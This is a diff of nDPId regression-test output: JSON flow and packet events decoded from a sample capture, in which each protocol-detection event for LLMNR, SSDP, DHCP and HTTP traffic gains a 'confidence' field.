 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1470104382448,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1470104382448,"pkt":"AQBeAAD86LH8q\/uyCABFAAA9ed0AAAERmP3AqAUx4AAA\/PBsFOsAKYTXzZEAAAABAAAAAAAAD2NhZXNhci10aGlua3BhZAAA\/wAB"}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1470104382448,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1470104382448,"pkt":"AQBef\/\/66LH8q\/uyCABFAAClCesAAAQR9onAqAUx7\/\/\/+sn4B2wAkYV1TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1470104382857,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":95,"pkt_l4_len":41,"ts_msec":1470104382857,"pkt":"MzMAAQAD6LH8q\/uyht1gAAAAACkRAf6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAQAD8GwU6wApG1\/NkQAAAAEAAAAAAAAPY2Flc2FyLXRoaW5rcGFkAAD\/AAE="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1470104382858,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1470104382858,"pkt":"AQBeAAD86LH8q\/uyCABFAAA9ed8AAAERmPvAqAUx4AAA\/PBsFOsAKYTXzZEAAAABAAAAAAAAD2NhZXNhci10aGlua3BhZAAA\/wAB"}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1470104383675,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1470104383675,"pkt":"AQBef\/\/6zD2CHu7jCABFAAClQLYAAAQRv8DAqAUv7\/\/\/+utrB2wAkWQETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104383810,"flow_last_seen":1470104383810,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104383810,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00830{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1470104383810,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1470104383810,"pkt":"TF4M6gNlYMVHBbyMCABFAAFI+0MAAEARgP\/AqAUQwKh3AQBEAEMBNFvxAQEGABeXwMwAAAAAwKgFEAAAAAAAAAAAAAAAAGDFRwW8jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwkBAwYPd1\/8LC45AgXcPQcBYMVHBbyMMwQAdqcADAtNYWNCb29rLUFpcv8AAAAAAAAAAAAAAAAA"}
-00699{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104383810,"flow_last_seen":1470104383810,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104383810,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"macbook-air","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}}
+00725{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104383810,"flow_last_seen":1470104383810,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104383810,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"macbook-air","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}}
 00831{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1470104383815,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1470104383815,"pkt":"ABxCjnAxTF4M6gNlCABFAAFIAAAAABARrEPAqHcBwKgFEABDAEQBNHbOAgEGABeXwMwAAAAAwKgFEMCoBRDAqHcBAAAAAGDFRwW8jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQE\/wAAAAAAAAAAAAAAAAAA"}
 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1470104384085,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104384085,"pkt":"AQBef\/\/6\/PiuMpcsCABFAAChLEMAAAER2QfAqANf7\/\/\/+uhMB2wAjbUvTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1470104384289,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104384289,"pkt":"AQBef\/\/6CJ4BzeuNCABFAAChFFAAAAER7zTAqAUl7\/\/\/+t\/tB2wAjbvITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
@@ -262,7 +262,7 @@
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1470104390443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1470104390443,"pkt":"TF4M6gNlYMVHBbyMCABFAABAN95AAEAG+rLAqAUQROn9hdF4AFAesUW4AAAAALAC\/\/+iVAAAAgQFtAEDAwUBAQgKGg88QAAAAAAEAgAA"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1470104390640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1470104390640,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADUGPZVE6f2FwKgFEABQ0Xh2OO96HrFFuaASFqBImwAAAgQFtAQCCArPHh84Gg88QAEDAwg="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1470104390640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104390640,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0PI1AAEAG9g\/AqAUQROn9hdF4AFAesUW5djjve4AQEBV9LwAAAQEIChoPPQTPHh84"}
-00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104390443,"flow_last_seen":1470104390642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1470104390642,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}}
+00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104390443,"flow_last_seen":1470104390642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1470104390642,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1470104390741,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1470104390741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":185,"pkt_l4_len":131,"ts_msec":1470104390741,"pkt":"MzMAAAABTF4MmuxUht1gAAAAAIMRAf6AAAAAAAAATl4M\/\/6a7FT\/AgAAAAAAAAAAAAAAAAABFi4WLgCDan0ABGg\/AAEABkxeDJrsVAAFAAAABwAPNi4zNS4xIChzdGFibGUpAAgACE1pa3JvVGlrAAoABHzzfwAACwAJM0RYWS1LSEdEAAwADUNSUzEyNS0yNEctMVMADgABAQAPABD+gAAAAAAAAE5eDP\/+muxUABAAB2JyaWRnZTE="}
 00869{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1470104390945,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"ts_msec":1470104390945,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
@@ -272,33 +272,33 @@
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1470104391208,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104391208,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0a70AAC4G7uxA6b2AwKhzCABQwa1HQonO9XiAjYAQAVdRKwAAAQEFCvV4gIz1eICN"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1470104391254,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1470104391254,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD+KsU6wAgEMLGawAAAAEAAAAAAAAGaXNhdGFwAAABAAE="}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104391254,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1470104391254,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104391254,"pkt":"AQBeAAD8PKn0WgOECABFAAA0HuAAAAER9UjAqAPs4AAA\/MoCFOsAIFaUxmsAAAABAAAAAAAABmlzYXRhcAAAAQAB"}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104391254,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1470104391254,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1470104391361,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1470104391361,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD+KsU6wAgEMLGawAAAAEAAAAAAAAGaXNhdGFwAAABAAE="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1470104391362,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104391362,"pkt":"AQBeAAD8PKn0WgOECABFAAA0HuEAAAER9UfAqAPs4AAA\/MoCFOsAIFaUxmsAAAABAAAAAAAABmlzYXRhcAAAAQAB"}
 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1470104391458,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1470104391458,"pkt":"AQBef\/\/66LH8q\/uyCABFAAClCe4AAAQR9obAqAUx7\/\/\/+sn4B2wAkYV1TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391564,"flow_last_seen":1470104391564,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1470104391564,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1470104391564,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1470104391564,"pkt":"\/\/\/\/\/\/\/\/PKn0WgOECABFAABOHugAAIARlnrAqAPswKj\/\/wCJAIkAOqdmilEBEAABAAAAAAAAIEVKRkRFQkZFRUJGQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="}
